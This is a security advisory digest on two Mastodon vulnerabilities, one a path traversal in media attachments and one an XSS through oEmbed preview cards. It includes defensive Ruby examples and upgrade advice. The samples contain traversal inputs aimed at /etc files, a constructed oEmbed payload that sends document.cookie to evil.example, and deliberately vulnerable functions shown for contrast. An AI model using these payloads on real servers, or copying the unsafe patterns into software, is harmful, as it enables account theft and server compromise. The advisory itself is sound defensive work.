In this week’s digest, we discuss two critical vulnerabilities in Mastodon.
Mastodon Security Advisory
Mastodon is a free, open source, and widely used decentralized social network with microblogging features, often viewed as an open source, decentralized alternative to Twitter. It runs as independently managed instances (nodes) hosted by different entities, many of them on cloud hosting platforms such as Linode.
CVE-2023-36460: Arbitrary File Creation Through Media Attachments
This vulnerability, tracked as CVE-2023-36460 and described under GHSA-9928, allows an attacker to create or overwrite files at any location the Mastodon instance's process can write to.
Vulnerable versions (from 3.5.0 up to but not including 3.5.9, 4.0.5, and 4.1.3) build a filesystem path from attacker-controlled input, supplied through a crafted media attachment, without neutralizing the special path elements in it. The input is meant to name a file or directory below a restricted directory, but nothing confines the resolved path to that directory, so traversal sequences such as ../ allow access and writes outside it. Depending on which file the attacker overwrites, the outcome ranges from denial of service to remote code execution on the Mastodon server.
The vulnerability has a high impact and is rated critical: any user who can post to a Mastodon server can exploit it, and because Mastodon is a social platform, the set of accounts able to post (and therefore to attempt this) is very large.
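The traversal class described above comes down to one missing check: the path built from untrusted input is never confirmed to lie beneath the intended root. The following Ruby is an added illustration of that check, written for this digest; it is not Mastodon's code and does not reproduce the actual CVE-2023-36460 code path. MEDIA_ROOT, the function names, and the sample names are assumptions made for the example. Ruby is used because Mastodon is a Rails application.

```ruby
require 'tmpdir'

# Hypothetical media root for the example; not Mastodon's real configuration.
MEDIA_ROOT = '/srv/mastodon/public/system'.freeze

# Vulnerable pattern: the untrusted name is joined onto the root with no
# normalisation, so '..' segments and absolute names walk out of the root.
def naive_media_path(untrusted_name, root = MEDIA_ROOT)
  File.join(root, untrusted_name)
end

# Hardened pattern: normalise lexically, then require the result to be the
# root itself or a path strictly beneath root + '/'. Returns nil on escape.
def contained_media_path(untrusted_name, root = MEDIA_ROOT)
  name = untrusted_name.to_s
  # Embedded NUL bytes truncate paths in C-based APIs; reject them outright.
  return nil if name.include?("\0")

  root_abs = File.absolute_path(root)
  # File.absolute_path collapses '.' and '..' and lets an absolute input win
  # over the base directory, which is exactly the case that must be caught.
  # Unlike File.expand_path it does NOT expand a leading '~'.
  candidate = File.absolute_path(name, root_abs)

  # Compare against root plus separator so that '/srv/media-other' is not
  # mistaken for a child of '/srv/media'.
  inside = candidate == root_abs || candidate.start_with?(root_abs + File::SEPARATOR)
  inside ? candidate : nil
end

# A lexical check cannot see a symlink planted inside the root. Where the
# target already exists, also compare the symlink-resolved paths.
def contained_real_path(untrusted_name, root = MEDIA_ROOT)
  candidate = contained_media_path(untrusted_name, root)
  return nil unless candidate && File.exist?(candidate) && File.exist?(root)

  real_root = File.realpath(root)
  real = File.realpath(candidate)
  real == real_root || real.start_with?(real_root + File::SEPARATOR) ? real : nil
end

if __FILE__ == $PROGRAM_NAME
  ['avatars/1/original.png', '../../../../etc/cron.d/evil', '/etc/passwd', '~/x'].each do |n|
    puts "#{n.inspect}: naive=#{naive_media_path(n)} checked=#{contained_media_path(n).inspect}"
  end
  # Constructed demo of the symlink case: a link inside the root pointing at /.
  Dir.mktmpdir do |root|
    File.symlink('/', File.join(root, 'escape'))
    puts "symlink escape: #{contained_real_path('escape', root).inspect}"
  end
end
```

The lexical check is what catches the traversal itself; the realpath check is the caveat for deployments where an attacker can already create symlinks (for example from an earlier bug) and only applies once the target exists, so it cannot replace the first check for create-on-write paths.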
CVE-2023-36459: XSS through oEmbed preview cards
This vulnerability, tracked as CVE-2023-36459 and described under GHSA-ccm4, is a Cross-Site Scripting (XSS) vulnerability: an attacker can craft oEmbed data so that arbitrary HTML ends up in a Mastodon oEmbed preview card, exposing every user who views the card to the risks of loading attacker-controlled markup.
Vulnerable versions (from 1.3 up to but not including 3.5.9, 4.0.5, and 4.1.3) let an attacker bypass the HTML sanitization step through oEmbed data. They do not correctly neutralize user-controllable input in oEmbed preview cards before it is emitted as part of a page served to other users, so attacker-controlled HTML reaches those users' browsers. This gives XSS payloads a delivery vector: when a victim interacts with the card, untrusted script runs in the victim's browser within the Mastodon web interface.
The vulnerability has a high impact and critical severity. oEmbed data is fetched from the site a link points to, so anyone who can get a link posted whose oEmbed response they control can exploit it, and every user of an affected server who views the resulting preview card is exposed.
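The underlying mistake is treating the html field of a third-party oEmbed response as safe markup. The Ruby below is an added example for this digest, not Mastodon's code or its actual fix: instead of sanitizing provider markup, it keeps only an https iframe URL on an allowlisted host and rebuilds the iframe itself with every attribute escaped. The host allowlist, function names, and the hostile oEmbed document are constructed for the illustration.

```ruby
require 'json'
require 'uri'
require 'cgi'

# Assumed allowlist of embed hosts for the example; not Mastodon's list.
ALLOWED_EMBED_HOSTS = %w[www.youtube.com player.vimeo.com].freeze
EMBED_TYPES = %w[video rich].freeze

# Vulnerable pattern: the provider's html field is echoed into the page.
def unsafe_card_html(oembed)
  oembed['html'].to_s
end

# Pull the first iframe src out of the provider markup. This does not need to
# be a full HTML parser: whatever it returns is only ever used as a URL string
# that is validated and re-escaped below, so a mis-parse fails closed.
def iframe_src(html)
  m = html.to_s.match(/<iframe\b[^>]*?\bsrc\s*=\s*["']([^"']*)["']/i)
  m && m[1]
end

# Accept only syntactically valid https URLs with a host; javascript:, data:,
# http: and unparsable strings all come back nil.
def parse_https(str)
  uri = URI.parse(str)
  uri.is_a?(URI::HTTPS) && uri.host ? uri : nil
rescue URI::InvalidURIError
  nil
end

# Width/height are attacker-supplied too: allow up to four digits, clamp.
def dimension(value, default)
  digits = value.to_s[/\A\d{1,4}\z/]
  digits ? digits.to_i.clamp(1, 2000) : default
end

# Hardened pattern: never reuse provider markup. Validate the URL, then build
# the iframe from scratch with escaped attributes.
def safe_card_html(oembed)
  return nil unless EMBED_TYPES.include?(oembed['type'])

  src = iframe_src(oembed['html'])
  uri = src && parse_https(src)
  return nil unless uri && ALLOWED_EMBED_HOSTS.include?(uri.host.downcase)
  # https://www.youtube.com@evil.example/ parses with host evil.example, which
  # the allowlist already rejects; refuse any userinfo so the case is explicit.
  return nil if uri.userinfo

  w = dimension(oembed['width'], 560)
  h = dimension(oembed['height'], 315)
  # The frame's origin is the provider's, so allow-same-origin does not give
  # it the embedding Mastodon page's origin.
  %(<iframe src="#{CGI.escapeHTML(uri.to_s)}" width="#{w}" height="#{h}" ) +
    %(sandbox="allow-scripts allow-same-origin" allowfullscreen></iframe>)
end

# Constructed sample: a hostile provider response hiding a script payload
# behind a legitimate-looking embed.
HOSTILE_OEMBED_JSON = <<~JSON
  {
    "version": "1.0",
    "type": "video",
    "provider_name": "evil.example",
    "width": "560",
    "height": "315",
    "html": "<iframe src=\\"https://www.youtube.com/embed/dQw4w9WgXcQ?a=1&b=2\\" width=\\"560\\"></iframe><script>location='https://evil.example/?c='+document.cookie</script>"
  }
JSON
HOSTILE_OEMBED = JSON.parse(HOSTILE_OEMBED_JSON)

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{unsafe_card_html(HOSTILE_OEMBED)}"
  puts "safe:   #{safe_card_html(HOSTILE_OEMBED)}"
end
```

The design choice is that no byte of the provider's markup survives into the output: the only thing carried over is a URL that has passed scheme and host checks and is then HTML-escaped, so a bypass of the extraction regex cannot become a bypass of the sanitizer.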
- Update your hosted Mastodon instances to the patched release for your branch: 4.1.3, 4.0.5, or 3.5.9
- Make sure the Mastodon servers you visit are up to date with the latest version
Note: Mastodon can be hosted on Linodes via manual installation and is also offered as a One Click Marketplace App. These instances are not managed or maintained by Linode, however, so it is up to Linode users to understand the risks and keep the installed software up to date. For more information, check out our Mastodon Marketplace App Deployment Guide.
Updated July 14, 2023: Follow our community guide on upgrading Mastodon instances to ensure your Mastodon version is up to date.